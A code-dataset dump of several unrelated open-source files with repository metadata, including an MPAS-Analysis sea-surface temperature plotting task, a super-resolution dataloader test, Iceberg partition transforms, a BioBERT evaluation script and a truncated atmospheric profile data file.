a8c568180abf96879e890a73e848db58642cfdb6
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
mpas_analysis/ocean/time_series_sst.py
|
alicebarthel/MPAS-Analysis
|
a8c568180abf96879e890a73e848db58642cfdb6
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
mpas_analysis/ocean/time_series_sst.py
|
alicebarthel/MPAS-Analysis
|
a8c568180abf96879e890a73e848db58642cfdb6
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# This software is open source software available under the BSD-3 license.
#
# Copyright (c) 2020 Triad National Security, LLC. All rights reserved.
# Copyright (c) 2020 Lawrence Livermore National Security, LLC. All rights
# reserved.
# Copyright (c) 2020 UT-Battelle, LLC. All rights reserved.
#
# Additional copyright and license information can be found in the LICENSE file
# distributed with this code, or at
# https://raw.githubusercontent.com/MPAS-Dev/MPAS-Analysis/master/LICENSE
from __future__ import absolute_import, division, print_function, \
unicode_literals
from mpas_analysis.shared import AnalysisTask
from mpas_analysis.shared.plot import timeseries_analysis_plot, savefig
from mpas_analysis.shared.time_series import combine_time_series_with_ncrcat
from mpas_analysis.shared.io import open_mpas_dataset
from mpas_analysis.shared.timekeeping.utility import date_to_days, \
days_to_datetime
from mpas_analysis.shared.io.utility import build_config_full_path, \
make_directories, check_path_exists
from mpas_analysis.shared.html import write_image_xml
class TimeSeriesSST(AnalysisTask):
"""
Performs analysis of the time-series output of sea-surface temperature
(SST).
Attributes
----------
mpasTimeSeriesTask : ``MpasTimeSeriesTask``
The task that extracts the time series from MPAS monthly output
controlConfig : ``MpasAnalysisConfigParser``
Configuration options for a control run (if any)
"""
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani
def __init__(self, config, mpasTimeSeriesTask, controlConfig=None):
# {{{
"""
Construct the analysis task.
Parameters
----------
config : ``MpasAnalysisConfigParser``
Configuration options
mpasTimeSeriesTask : ``MpasTimeSeriesTask``
The task that extracts the time series from MPAS monthly output
controlConfig : ``MpasAnalysisConfigParser``, optional
Configuration options for a control run (if any)
"""
# Authors
# -------
# Xylar Asay-Davis
# first, call the constructor from the base class (AnalysisTask)
super(TimeSeriesSST, self).__init__(
config=config,
taskName='timeSeriesSST',
componentName='ocean',
tags=['timeSeries', 'sst', 'publicObs'])
self.mpasTimeSeriesTask = mpasTimeSeriesTask
self.controlConfig = controlConfig
self.run_after(mpasTimeSeriesTask)
# }}}
def setup_and_check(self): # {{{
"""
Perform steps to set up the analysis and check for errors in the setup.
Raises
------
OSError
If files are not present
"""
# Authors
# -------
# Xylar Asay-Davis
# first, call setup_and_check from the base class (AnalysisTask),
# which will perform some common setup, including storing:
# self.inDirectory, self.plotsDirectory, self.namelist, self.streams
# self.calendar
super(TimeSeriesSST, self).setup_and_check()
config = self.config
self.startDate = self.config.get('timeSeries', 'startDate')
self.endDate = self.config.get('timeSeries', 'endDate')
self.variableList = \
['timeMonthly_avg_avgValueWithinOceanRegion_avgSurfaceTemperature']
self.mpasTimeSeriesTask.add_variables(variableList=self.variableList)
if config.get('runs', 'preprocessedReferenceRunName') != 'None':
check_path_exists(config.get('oceanPreprocessedReference',
'baseDirectory'))
self.inputFile = self.mpasTimeSeriesTask.outputFile
mainRunName = config.get('runs', 'mainRunName')
regions = config.getExpression('timeSeriesSST', 'regions')
self.xmlFileNames = []
self.filePrefixes = {}
for region in regions:
filePrefix = 'sst_{}_{}'.format(region, mainRunName)
self.xmlFileNames.append('{}/{}.xml'.format(self.plotsDirectory,
filePrefix))
self.filePrefixes[region] = filePrefix
return # }}}
def run_task(self): # {{{
"""
Performs analysis of the time-series output of sea-surface temperature
(SST).
"""
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani
self.logger.info("\nPlotting SST time series...")
self.logger.info(' Load SST data...')
config = self.config
calendar = self.calendar
mainRunName = config.get('runs', 'mainRunName')
preprocessedReferenceRunName = \
config.get('runs', 'preprocessedReferenceRunName')
preprocessedInputDirectory = config.get('oceanPreprocessedReference',
'baseDirectory')
movingAveragePoints = config.getint('timeSeriesSST',
'movingAveragePoints')
regions = config.getExpression('regions', 'regions')
plotTitles = config.getExpression('regions', 'plotTitles')
regionsToPlot = config.getExpression('timeSeriesSST', 'regions')
regionIndicesToPlot = [regions.index(region) for region in
regionsToPlot]
outputDirectory = build_config_full_path(config, 'output',
'timeseriesSubdirectory')
make_directories(outputDirectory)
dsSST = open_mpas_dataset(fileName=self.inputFile,
calendar=calendar,
variableList=self.variableList,
startDate=self.startDate,
endDate=self.endDate)
yearStart = days_to_datetime(dsSST.Time.min(), calendar=calendar).year
yearEnd = days_to_datetime(dsSST.Time.max(), calendar=calendar).year
timeStart = date_to_days(year=yearStart, month=1, day=1,
calendar=calendar)
timeEnd = date_to_days(year=yearEnd, month=12, day=31,
calendar=calendar)
if self.controlConfig is not None:
baseDirectory = build_config_full_path(
self.controlConfig, 'output', 'timeSeriesSubdirectory')
controlFileName = '{}/{}.nc'.format(
baseDirectory, self.mpasTimeSeriesTask.fullTaskName)
controlStartYear = self.controlConfig.getint(
'timeSeries', 'startYear')
controlEndYear = self.controlConfig.getint('timeSeries', 'endYear')
controlStartDate = '{:04d}-01-01_00:00:00'.format(controlStartYear)
controlEndDate = '{:04d}-12-31_23:59:59'.format(controlEndYear)
dsRefSST = open_mpas_dataset(
fileName=controlFileName,
calendar=calendar,
variableList=self.variableList,
startDate=controlStartDate,
endDate=controlEndDate)
else:
dsRefSST = None
if preprocessedReferenceRunName != 'None':
            self.logger.info(' Load in SST for a preprocessed reference '
'run...')
inFilesPreprocessed = '{}/SST.{}.year*.nc'.format(
preprocessedInputDirectory, preprocessedReferenceRunName)
outFolder = '{}/preprocessed'.format(outputDirectory)
make_directories(outFolder)
outFileName = '{}/sst.nc'.format(outFolder)
combine_time_series_with_ncrcat(inFilesPreprocessed,
outFileName, logger=self.logger)
dsPreprocessed = open_mpas_dataset(fileName=outFileName,
calendar=calendar,
timeVariableNames='xtime')
yearEndPreprocessed = days_to_datetime(dsPreprocessed.Time.max(),
calendar=calendar).year
if yearStart <= yearEndPreprocessed:
dsPreprocessedTimeSlice = \
dsPreprocessed.sel(Time=slice(timeStart, timeEnd))
else:
self.logger.warning('Preprocessed time series ends before the '
'timeSeries startYear and will not be '
'plotted.')
preprocessedReferenceRunName = 'None'
self.logger.info(' Make plots...')
for regionIndex in regionIndicesToPlot:
region = regions[regionIndex]
title = '{} SST'.format(plotTitles[regionIndex])
xLabel = 'Time [years]'
yLabel = r'[$\degree$C]'
varName = self.variableList[0]
SST = dsSST[varName].isel(nOceanRegions=regionIndex)
filePrefix = self.filePrefixes[region]
outFileName = '{}/{}.png'.format(self.plotsDirectory, filePrefix)
lineColors = ['k']
lineWidths = [3]
fields = [SST]
legendText = [mainRunName]
if dsRefSST is not None:
refSST = dsRefSST[varName].isel(nOceanRegions=regionIndex)
fields.append(refSST)
lineColors.append('r')
lineWidths.append(1.5)
controlRunName = self.controlConfig.get('runs', 'mainRunName')
legendText.append(controlRunName)
if preprocessedReferenceRunName != 'None':
SST_v0 = dsPreprocessedTimeSlice.SST
fields.append(SST_v0)
lineColors.append('purple')
lineWidths.append(1.5)
legendText.append(preprocessedReferenceRunName)
if config.has_option(self.taskName, 'firstYearXTicks'):
firstYearXTicks = config.getint(self.taskName,
'firstYearXTicks')
else:
firstYearXTicks = None
if config.has_option(self.taskName, 'yearStrideXTicks'):
yearStrideXTicks = config.getint(self.taskName,
'yearStrideXTicks')
else:
yearStrideXTicks = None
timeseries_analysis_plot(config, fields, calendar=calendar,
title=title, xlabel=xLabel, ylabel=yLabel,
movingAveragePoints=movingAveragePoints,
lineColors=lineColors,
lineWidths=lineWidths,
legendText=legendText,
firstYearXTicks=firstYearXTicks,
yearStrideXTicks=yearStrideXTicks)
savefig(outFileName)
caption = 'Running Mean of {} Sea Surface Temperature'.format(
region)
write_image_xml(
config=config,
filePrefix=filePrefix,
componentName='Ocean',
componentSubdirectory='ocean',
galleryGroup='Time Series',
groupLink='timeseries',
thumbnailDescription='{} SST'.format(region),
imageDescription=caption,
imageCaption=caption)
# }}}
# }}}
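
# Hedged usage sketch: in MPAS-Analysis the driver normally constructs and
# runs tasks; roughly (config and mpasTimeSeriesTask come from that driver):
#
#   task = TimeSeriesSST(config, mpasTimeSeriesTask, controlConfig=None)
#   task.setup_and_check()
#   task.run_task()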
# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
| 38.072131
| 79
| 0.577678
| 10,458
| 0.90062
| 0
| 0
| 0
| 0
| 0
| 0
| 3,293
| 0.283586
|
0cf233053cbaff62ed1842427e42c01b9e93c0c4
| 3,682
|
py
|
Python
|
codes/data_scripts/test_dataloader.py
|
DengpanFu/mmsr
|
addfabdaee86d2f9e41988dcfe92a817c5efe7ab
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/test_dataloader.py
|
DengpanFu/mmsr
|
addfabdaee86d2f9e41988dcfe92a817c5efe7ab
|
[
"Apache-2.0"
] | null | null | null |
codes/data_scripts/test_dataloader.py
|
DengpanFu/mmsr
|
addfabdaee86d2f9e41988dcfe92a817c5efe7ab
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os.path as osp
import math
import torchvision.utils
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from data import create_dataloader, create_dataset # noqa: E402
from utils import util # noqa: E402
def main():
dataset = 'REDS' # REDS | Vimeo90K | DIV2K800_sub
opt = {}
opt['dist'] = False
opt['gpu_ids'] = [0]
if dataset == 'REDS':
opt['name'] = 'test_REDS'
opt['dataroot_GT'] = '../../datasets/REDS/train_sharp_wval.lmdb'
opt['dataroot_LQ'] = '../../datasets/REDS/train_sharp_bicubic_wval.lmdb'
opt['mode'] = 'REDS'
opt['N_frames'] = 5
opt['phase'] = 'train'
opt['use_shuffle'] = True
opt['n_workers'] = 8
opt['batch_size'] = 16
opt['GT_size'] = 256
opt['LQ_size'] = 64
opt['scale'] = 4
opt['use_flip'] = True
opt['use_rot'] = True
opt['interval_list'] = [1]
opt['random_reverse'] = False
opt['border_mode'] = False
opt['cache_keys'] = None
opt['data_type'] = 'lmdb' # img | lmdb | mc
elif dataset == 'Vimeo90K':
opt['name'] = 'test_Vimeo90K'
opt['dataroot_GT'] = '../../datasets/vimeo90k/vimeo90k_train_GT.lmdb'
opt['dataroot_LQ'] = '../../datasets/vimeo90k/vimeo90k_train_LR7frames.lmdb'
opt['mode'] = 'Vimeo90K'
opt['N_frames'] = 7
opt['phase'] = 'train'
opt['use_shuffle'] = True
opt['n_workers'] = 8
opt['batch_size'] = 16
opt['GT_size'] = 256
opt['LQ_size'] = 64
opt['scale'] = 4
opt['use_flip'] = True
opt['use_rot'] = True
opt['interval_list'] = [1]
opt['random_reverse'] = False
opt['border_mode'] = False
opt['cache_keys'] = None
opt['data_type'] = 'lmdb' # img | lmdb | mc
elif dataset == 'DIV2K800_sub':
opt['name'] = 'DIV2K800'
opt['dataroot_GT'] = '../../datasets/DIV2K/DIV2K800_sub.lmdb'
opt['dataroot_LQ'] = '../../datasets/DIV2K/DIV2K800_sub_bicLRx4.lmdb'
opt['mode'] = 'LQGT'
opt['phase'] = 'train'
opt['use_shuffle'] = True
opt['n_workers'] = 8
opt['batch_size'] = 16
opt['GT_size'] = 128
opt['scale'] = 4
opt['use_flip'] = True
opt['use_rot'] = True
opt['color'] = 'RGB'
opt['data_type'] = 'lmdb' # img | lmdb
else:
raise ValueError('Please implement by yourself.')
util.mkdir('tmp')
train_set = create_dataset(opt)
train_loader = create_dataloader(train_set, opt, opt, None)
nrow = int(math.sqrt(opt['batch_size']))
padding = 2 if opt['phase'] == 'train' else 0
print('start...')
for i, data in enumerate(train_loader):
if i > 5:
break
print(i)
if dataset == 'REDS' or dataset == 'Vimeo90K':
LQs = data['LQs']
else:
LQ = data['LQ']
GT = data['GT']
if dataset == 'REDS' or dataset == 'Vimeo90K':
for j in range(LQs.size(1)):
torchvision.utils.save_image(LQs[:, j, :, :, :],
'tmp/LQ_{:03d}_{}.png'.format(i, j), nrow=nrow,
padding=padding, normalize=False)
else:
torchvision.utils.save_image(LQ, 'tmp/LQ_{:03d}.png'.format(i), nrow=nrow,
padding=padding, normalize=False)
torchvision.utils.save_image(GT, 'tmp/GT_{:03d}.png'.format(i), nrow=nrow, padding=padding,
normalize=False)
if __name__ == "__main__":
main()
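
# Example: run from the codes/data_scripts directory so the relative
# '../../datasets/...' paths in main() resolve; sample grids land in ./tmp:
#   cd codes/data_scripts && python test_dataloader.py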
| 35.066667
| 99
| 0.528246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,265
| 0.343563
|
0cf243e0f912db385063a422e6bbf35dbe9d0972
| 3,663
|
py
|
Python
|
python/iceberg/api/transforms/transforms.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 58
|
2019-09-10T20:51:26.000Z
|
2022-03-22T11:06:09.000Z
|
python/iceberg/api/transforms/transforms.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 292
|
2019-07-23T04:33:18.000Z
|
2021-07-26T04:28:22.000Z
|
python/iceberg/api/transforms/transforms.py
|
moulimukherjee/incubator-iceberg
|
bf7edc4b325df6dd80d86fea0149d2be0ad09468
|
[
"Apache-2.0"
] | 26
|
2019-08-28T23:59:03.000Z
|
2022-03-04T08:54:08.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
from .bucket import Bucket
from .dates import Dates
from .identity import Identity
from .timestamps import Timestamps
from .truncate import Truncate
from ..types import (TypeID)
"""
Factory methods for transforms.
<p>
Most users should create transforms using a
{@link PartitionSpec.Builder#builderFor(Schema)} partition spec builder}.
@see PartitionSpec#builderFor(Schema) The partition spec builder.
"""
class Transforms(object):
    HAS_WIDTH = re.compile(r"(\w+)\[(\d+)\]")
def __init__(self):
pass
@staticmethod
def from_string(type_var, transform):
match = Transforms.HAS_WIDTH.match(transform)
if match is not None:
name = match.group(1)
w = int(match.group(2))
if name.lower() == "truncate":
return Truncate.get(type_var, w)
elif name.lower() == "bucket":
return Bucket.get(type_var, w)
if transform.lower() == "identity":
return Identity.get(type_var)
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps(transform.lower(), transform.lower())
elif type_var.type_id == TypeID.DATE:
return Dates(transform.lower(), transform.lower())
raise RuntimeError("Unknown transform: %s" % transform)
@staticmethod
def identity(type_var):
return Identity.get(type_var)
@staticmethod
def year(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("year", "year")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("year", "year")
else:
raise RuntimeError("Cannot partition type %s by year" % type_var)
@staticmethod
def month(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("month", "month")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("month", "month")
else:
raise RuntimeError("Cannot partition type %s by month" % type_var)
@staticmethod
def day(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("day", "day")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("day", "day")
else:
raise RuntimeError("Cannot partition type %s by day" % type_var)
@staticmethod
def hour(type_var):
if type_var.type_id == TypeID.DATE:
return Dates("hour", "hour")
elif type_var.type_id == TypeID.TIMESTAMP:
return Timestamps("hour", "hour")
else:
raise RuntimeError("Cannot partition type %s by hour" % type_var)
@staticmethod
def bucket(type_var, num_buckets):
return Bucket.get(type_var, num_buckets)
@staticmethod
def truncate(type_var, width):
return Truncate.get(type_var, width)
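
# Hedged usage sketch (assumes the Python port mirrors the Java type API,
# where primitive types expose get()/with_timezone() factories; adjust the
# imports for your install):
#
#   from iceberg.api.types import IntegerType, TimestampType
#   Transforms.from_string(IntegerType.get(), "bucket[16]")   # -> Bucket
#   Transforms.month(TimestampType.with_timezone())           # -> Timestamps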
| 32.705357
| 78
| 0.65329
| 2,449
| 0.668578
| 0
| 0
| 2,289
| 0.624898
| 0
| 0
| 1,305
| 0.356265
|
0cf5f33e0cfd554440d95e9093a443f85242c9cf
| 3,067
|
py
|
Python
|
biocodes/re_eval.py
|
yjc9696/biobert-my
|
ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3
|
[
"Apache-2.0"
] | null | null | null |
biocodes/re_eval.py
|
yjc9696/biobert-my
|
ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3
|
[
"Apache-2.0"
] | 3
|
2020-11-13T17:48:47.000Z
|
2022-02-09T23:43:16.000Z
|
biocodes/re_eval.py
|
yjc9696/biobert-my
|
ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import numpy as np
import pandas as pd
import sklearn.metrics
parser = argparse.ArgumentParser(description='')
parser.add_argument('--output_path', type=str, help='')
parser.add_argument('--answer_path', type=str, help='')
parser.add_argument('--task', type=str, default="binary", help='default:binary, possible other options:{chemprot}')
args = parser.parse_args()
testdf = pd.read_csv(args.answer_path, sep="\t")
preddf = pd.read_csv(args.output_path, sep="\t", header=None)
# binary
if args.task == "binary":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
pred_prob_one = [v[1] for v in pred]
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=testdf["label"])
results = dict()
results["f1 score"] = f[1]
results["recall"] = r[1]
results["precision"] = p[1]
results["specificity"] = r[0]
# chemprot
# micro-average of 5 target classes
# see "Potent pairing: ensemble of long short-term memory networks and support vector machine for chemical-protein relation extraction (Mehryary, 2018)" for details
if args.task == "chemprot":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
str_to_int_mapper = dict()
for i, v in enumerate(sorted(testdf["label"].unique())):
str_to_int_mapper[v] = i
test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
if args.task == "N2C2":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
str_to_int_mapper = dict()
labels = ["Reason-Drug", "Route-Drug", "Strength-Drug", "Frequency-Drug", "Duration-Drug", "Form-Drug", "Dosage-Drug", "ADE-Drug"]
for i, v in enumerate(labels):
str_to_int_mapper[v] = i
test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
# print(sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8], average="none"))
for i, label in enumerate(labels):
print(label + " result")
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[i], average="macro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
for k, v in results.items():
print("{:11s} : {:.2%}".format(k, v))
print('\n')
print('total' + " result\n")
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
for k, v in results.items():
print("{:11s} : {:.2%}".format(k, v))
| 41.445946
| 164
| 0.661559
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 847
| 0.276166
|
0cf776032667c66aa9047465a936c18e4c0e130b
| 99
|
py
|
Python
|
mysite/ChainLicense/apps.py
|
Hwieun/ChainLicense
|
35d552ff1cfd056584a54b946999ff287e87d8ad
|
[
"Apache-2.0"
] | 2
|
2019-09-23T01:55:46.000Z
|
2019-11-08T16:33:47.000Z
|
mysite/ChainLicense/apps.py
|
Hwieun/ChainLicense
|
35d552ff1cfd056584a54b946999ff287e87d8ad
|
[
"Apache-2.0"
] | 1
|
2019-10-07T01:11:55.000Z
|
2019-10-07T01:11:55.000Z
|
mysite/ChainLicense/apps.py
|
Hwieun/ChainLicense
|
35d552ff1cfd056584a54b946999ff287e87d8ad
|
[
"Apache-2.0"
] | 1
|
2019-09-24T06:22:30.000Z
|
2019-09-24T06:22:30.000Z
|
from django.apps import AppConfig
class ChainlicenseConfig(AppConfig):
name = 'ChainLicense'
| 16.5
| 36
| 0.777778
| 62
| 0.626263
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.141414
|
0cf9f78c1ecb148ea8cc9e86512596f09bae6846
| 1,403
|
py
|
Python
|
tests/test_find_deployment.py
|
Suremaker/consul-deployment-agent
|
466c36d3fcb9f8bfa144299dde7cb94f4341907b
|
[
"Apache-2.0"
] | 6
|
2016-10-10T09:26:07.000Z
|
2018-09-20T08:59:42.000Z
|
tests/test_find_deployment.py
|
Suremaker/consul-deployment-agent
|
466c36d3fcb9f8bfa144299dde7cb94f4341907b
|
[
"Apache-2.0"
] | 11
|
2016-10-10T12:11:07.000Z
|
2018-05-09T22:11:02.000Z
|
tests/test_find_deployment.py
|
Suremaker/consul-deployment-agent
|
466c36d3fcb9f8bfa144299dde7cb94f4341907b
|
[
"Apache-2.0"
] | 16
|
2016-09-28T16:00:58.000Z
|
2019-02-25T16:52:12.000Z
|
# Copyright (c) Trainline Limited, 2016-2017. All rights reserved. See LICENSE.txt in the project root for license information.
from os.path import join
import unittest
from mock import patch
from agent.find_deployment import find_deployment_dir_win
class Fake(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class TestFindDeployment(unittest.TestCase):
def test_find_deployment_dir_win_finds_none_returns_none(self):
with patch('agent.find_deployment.exists', return_value=False):
expected = None
actual = find_deployment_dir_win('/deployments', 'my_service', 'my_deployment_id')
self.assertEqual(actual, expected)
def test_find_deployment_dir_win_finds_both_returns_new(self):
with patch('agent.find_deployment.exists', return_value=True):
expected = join('/deployments', 'my_service', 'my_deployment_id')
actual = find_deployment_dir_win('/deployments', 'my_service', 'my_deployment_id')
self.assertEqual(actual, expected)
def test_find_deployment_dir_win_finds_old_returns_old(self):
expected = join('/deployments', 'my_deployment_id')
with patch('agent.find_deployment.exists', lambda x: x == expected):
actual = find_deployment_dir_win('/deployments', 'my_service', 'my_deployment_id')
self.assertEqual(actual, expected)
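
# Example: run these tests from the repository root with unittest
# (module path follows the tests/ layout):
#   python -m unittest tests.test_find_deployment -v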
| 48.37931
| 127
| 0.726301
| 1,149
| 0.818959
| 0
| 0
| 0
| 0
| 0
| 0
| 425
| 0.302922
|
0cfa89782c8d3290c0c6ceba7319a0449a110fed
| 2,585
|
py
|
Python
|
model/embeddings.py
|
johnnytorres/crisis_conv_crosslingual
|
a30e762007e08190275bdd83af3c0bbc717fb516
|
[
"MIT"
] | null | null | null |
model/embeddings.py
|
johnnytorres/crisis_conv_crosslingual
|
a30e762007e08190275bdd83af3c0bbc717fb516
|
[
"MIT"
] | null | null | null |
model/embeddings.py
|
johnnytorres/crisis_conv_crosslingual
|
a30e762007e08190275bdd83af3c0bbc717fb516
|
[
"MIT"
] | 1
|
2019-12-03T00:29:14.000Z
|
2019-12-03T00:29:14.000Z
|
import os
import logging
import argparse
import numpy as np
import tensorflow as tf
from keras_preprocessing.text import Tokenizer
from tqdm import tqdm
from data import DataLoader
class EmbeddingsBuilder:
def __init__(self, args):
logging.info('initializing...')
self.args = args
self.dataset = DataLoader(self.args)
self.embeddings_path = args.embeddings_path
self.small_embeddings_path = os.path.splitext(self.embeddings_path)[0] + '_small.vec'
logging.info('initializing...[ok]')
def build_embedding(self, vocab_dict):
"""
Load embedding vectors from a .txt file.
Optionally limit the vocabulary to save memory. `vocab` should be a set.
"""
num_words = len(vocab_dict)
num_found = 0
with open(self.small_embeddings_path, 'w') as out_file:
with tf.gfile.GFile(self.embeddings_path) as f:
                header = next(f)
num_embeddings, embeddings_dim = header.split(' ')
num_embeddings = int(num_embeddings)
out_file.write(header)
for _, line in tqdm(enumerate(f), 'loading embeddings', total=num_embeddings):
tokens = line.rstrip().split(" ")
word = tokens[0]
if word in vocab_dict:
num_found += 1
out_file.write(line)
tf.logging.info("Found embeddings for {} out of {} words in vocabulary".format(num_found, num_words))
def run(self):
self.dataset.load()
X = self.dataset.X_train_labeled['moment'].values
X = np.append(X, self.dataset.X_train_unlabeled['moment'].values, axis=0)
X = np.append(X, self.dataset.X_test['moment'].values, axis=0)
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
self.build_embedding(tokenizer.word_index)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
logging.info('initializing task...')
parser = argparse.ArgumentParser()
parser.add_argument('--data-dir', default='data/claff-happydb')
parser.add_argument('--embeddings-path', type=str, default=None)
parser.add_argument('--num-unlabeled', type=int, default=1000)
parser.add_argument('--use-allfeats', action='store_true', default=False)
parser.add_argument('--predict', action='store_true', default=True)
builder = EmbeddingsBuilder(args=parser.parse_args())
builder.run()
logging.info('task finished...[ok]')
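
# Example invocation (paths are hypothetical; --embeddings-path expects a
# word2vec-style .vec file whose first line is the "count dim" header):
#   python model/embeddings.py --data-dir data/claff-happydb \
#       --embeddings-path embeddings/wiki.en.vec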
| 31.91358
| 109
| 0.635977
| 1,729
| 0.668859
| 0
| 0
| 0
| 0
| 0
| 0
| 501
| 0.19381
|
0cfa9b70f4dd085778dfa0f986d2747b6f89ea72
| 430
|
py
|
Python
|
bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py
|
AngelRuizMoreno/Jupyter_Dock_devel
|
6d23bc174d5294d1e9909a0a1f9da0713042339e
|
[
"MIT"
] | null | null | null |
bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py
|
AngelRuizMoreno/Jupyter_Dock_devel
|
6d23bc174d5294d1e9909a0a1f9da0713042339e
|
[
"MIT"
] | null | null | null |
bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py
|
AngelRuizMoreno/Jupyter_Dock_devel
|
6d23bc174d5294d1e9909a0a1f9da0713042339e
|
[
"MIT"
] | 1
|
2021-11-04T21:48:14.000Z
|
2021-11-04T21:48:14.000Z
|
#############################################################################
#
# Author: Michel F. SANNER
#
# Copyright: M. Sanner and TSRI 2015
#
#########################################################################
#
# $Header: /mnt/raid/services/cvs/mglkeyDIST/mglkey/__init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
# $Id: __init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
from mglkey import MGL_check_key
| 30.714286
| 106
| 0.448837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 385
| 0.895349
|
0cfc5802ff58618fd079fd5185d9edd8be7eda97
| 13,342
|
py
|
Python
|
source/rttov_test/profile-datasets-py/div83/027.py
|
bucricket/projectMAScorrection
|
89489026c8e247ec7c364e537798e766331fe569
|
[
"BSD-3-Clause"
] | null | null | null |
source/rttov_test/profile-datasets-py/div83/027.py
|
bucricket/projectMAScorrection
|
89489026c8e247ec7c364e537798e766331fe569
|
[
"BSD-3-Clause"
] | 1
|
2022-03-12T12:19:59.000Z
|
2022-03-12T12:19:59.000Z
|
source/rttov_test/profile-datasets-py/div83/027.py
|
bucricket/projectMAScorrection
|
89489026c8e247ec7c364e537798e766331fe569
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Profile ../profile-datasets-py/div83/027.py
file automatically created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div83/027.py"
self["Q"] = numpy.array([ 1.51831800e+00, 2.02599600e+00, 2.94787100e+00,
3.99669400e+00, 4.71653800e+00, 4.89106600e+00,
5.14399400e+00, 5.67274800e+00, 6.02338400e+00,
6.09836300e+00, 6.08376300e+00, 6.01126400e+00,
5.91866500e+00, 5.77584700e+00, 5.59481900e+00,
5.41637100e+00, 5.26750200e+00, 5.10689400e+00,
4.98576500e+00, 4.90039600e+00, 4.80689700e+00,
4.63989800e+00, 4.46443000e+00, 4.30135100e+00,
4.16606300e+00, 4.06766300e+00, 4.01361400e+00,
3.95640400e+00, 3.87825500e+00, 3.79394600e+00,
3.73623600e+00, 3.72919600e+00, 3.74067600e+00,
3.78187600e+00, 3.81900500e+00, 3.85233500e+00,
3.88512500e+00, 3.91148500e+00, 3.92466500e+00,
3.92849500e+00, 3.93905400e+00, 3.97355400e+00,
4.02951400e+00, 4.05710400e+00, 4.04558400e+00,
4.02228400e+00, 4.01040400e+00, 4.00572400e+00,
4.00641400e+00, 4.08608300e+00, 4.44130000e+00,
5.00126500e+00, 5.73600700e+00, 6.83860300e+00,
8.34002000e+00, 9.95999100e+00, 1.13537700e+01,
1.24435500e+01, 1.36048100e+01, 1.55239600e+01,
1.77784800e+01, 1.93991200e+01, 2.00516000e+01,
1.97941100e+01, 1.89638400e+01, 1.84148600e+01,
1.82331700e+01, 1.84861600e+01, 2.02668900e+01,
3.24805400e+01, 6.31028200e+01, 1.09865900e+02,
1.71694500e+02, 2.41407700e+02, 3.05073900e+02,
3.60772800e+02, 4.04902000e+02, 4.16543400e+02,
4.04623200e+02, 3.59892400e+02, 3.06567000e+02,
3.03443900e+02, 4.25764600e+02, 8.75110500e+02,
1.60701300e+03, 2.52645100e+03, 3.50894400e+03,
4.39830900e+03, 5.05090900e+03, 5.40195000e+03,
5.54486300e+03, 5.86218200e+03, 6.10752900e+03,
